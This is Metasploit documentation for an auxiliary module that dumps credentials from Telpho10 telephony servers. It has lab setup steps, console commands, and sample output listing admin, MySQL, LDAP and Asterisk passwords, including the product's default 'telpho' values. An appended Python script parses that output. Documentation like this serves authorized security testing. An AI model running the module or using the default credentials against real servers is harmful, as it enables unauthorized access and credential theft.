GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/admin/http/telpho10_credential_dump.md

Vulnerable Application

Telpho10 v2.6.31 (32-bit Linux ISO image download here).

Supporting documentation for this product can be found here.

Verification Steps

The following steps will allow you to install and dump the credentials from a Telpho10 instance:

  1. Download the Telpho10 ISO image and install it in a VM (or on a system). Note that the ISO defaults to a German keyboard layout and expects a SATA hard drive (not IDE/PATA) for installation.

  2. Configure the Telpho10's IP address - edit /etc/networks/interfaces accordingly

  3. Start msfconsole

  4. Do: use auxiliary/admin/http/telpho10_credential_dump

  5. Do: set RHOST <IP address of your Telpho10 instance>

  6. Do: run

  7. You should see a list of the retrieved Telpho10 credentials

Scenarios

Example output when using this against a Telpho10 v2.6.31 VM:

    $ ./msfconsole
    # cowsay++
     ____________
    < metasploit >
     ------------
           \   ,__,
            \  (oo)____
               (__)    )\
                  ||--|| *

           =[ metasploit v4.12.36-dev-16fc6c1                 ]
    + -- --=[ 1596 exploits - 908 auxiliary - 273 post        ]
    + -- --=[ 458 payloads - 39 encoders - 8 nops             ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    msf > use auxiliary/admin/http/telpho10_credential_dump
    msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
    RHOST => 10.0.2.35
    msf auxiliary(telpho10_credential_dump) > run

    [*] Generating backup
    [*] Downloading backup
    [+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
    [*] Dumping credentials

    [*] Login (/telpho/login.php)
    [*] -------------------------
    [+] Username: admin
    [+] Password: telpho

    [*] MySQL (/phpmyadmin)
    [*] -------------------
    [+] Username: root
    [+] Password: telpho

    [*] LDAP (/phpldapadmin)
    [*] --------------------
    [+] Username: cn=admin,dc=localdomain
    [+] Password: telpho

    [*] Asterisk MI (port 5038)
    [*] -----------------------
    [+] Username: telpho
    [+] Password: telpho

    [*] Mail configuration
    [*] ------------------
    [+] Mailserver:
    [+] Username:
    [+] Password:
    [+] Mail from:

    [*] Online Backup
    [*] -------------
    [+] ID:
    [+] Password:

    [*] Auxiliary module execution completed
    msf auxiliary(telpho10_credential_dump) >

I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:

    msf auxiliary(telpho10_credential_dump) > run

    [*] Generating backup
    [*] Downloading backup
    [+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
    [*] Dumping credentials

    [*] Login (/telpho/login.php)
    [*] -------------------------
    [+] Username: admin
    [+] Password: s3cr3t

    [*] MySQL (/phpmyadmin)
    [*] -------------------
    [+] Username: root
    [+] Password: telpho

    [*] LDAP (/phpldapadmin)
    [*] --------------------
    [+] Username: cn=admin,dc=localdomain
    [+] Password: ldaps3cr3t

    [*] Asterisk MI (port 5038)
    [*] -----------------------
    [+] Username: telpho
    [+] Password: asterisks3cr3t

    [*] Mail configuration
    [*] ------------------
    [+] Mailserver:
    [+] Username:
    [+] Password:
    [+] Mail from:

    [*] Online Backup
    [*] -------------
    [+] ID:
    [+] Password:

    [*] Auxiliary module execution completed
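
When verifying password changes on a lab instance as in the second run above, it helps to check mechanically which services still report the value seen in the first run. The following Python script is an added example, not part of the Metasploit module or its documentation; the function names are hypothetical, and the embedded sample is constructed from the credential sections of the second run shown above.

```python
import re

# Constructed sample: credential sections excerpted from the second run above.
SAMPLE_RUN = """\
[*] Login (/telpho/login.php)
[*] -------------------------
[+] Username: admin
[+] Password: s3cr3t
[*] MySQL (/phpmyadmin)
[*] -------------------
[+] Username: root
[+] Password: telpho
[*] LDAP (/phpldapadmin)
[*] --------------------
[+] Username: cn=admin,dc=localdomain
[+] Password: ldaps3cr3t
[*] Asterisk MI (port 5038)
[*] -----------------------
[+] Username: telpho
[+] Password: asterisks3cr3t
"""

# Assumption: the password printed for every service in the first run above.
FIRST_RUN_PASSWORD = "telpho"

def parse_sections(output):
    """Return {section title: {field: value}} from the module's console output."""
    sections, current, prev = {}, None, None
    for line in output.splitlines():
        m = re.match(r"\[([*+])\]\s*(.*)", line.strip())
        if not m:
            continue
        kind, text = m.groups()
        if kind == "*":
            # A dashed underline marks the preceding [*] line as a section title;
            # other [*] lines ("Generating backup", ...) are plain status messages.
            if prev and set(text) == {"-"}:
                current, prev = sections.setdefault(prev, {}), None
            else:
                prev = text
        elif current is not None and ":" in text:
            field, _, value = text.partition(":")
            current[field.strip()] = value.strip()
    return sections

def unchanged_services(output, old_password=FIRST_RUN_PASSWORD):
    """List sections whose Password field still equals old_password."""
    return [title for title, fields in parse_sections(output).items()
            if fields.get("Password") == old_password]
```

Run against the second output above, this reports only the MySQL section, whose password was not among the values changed through the admin UI.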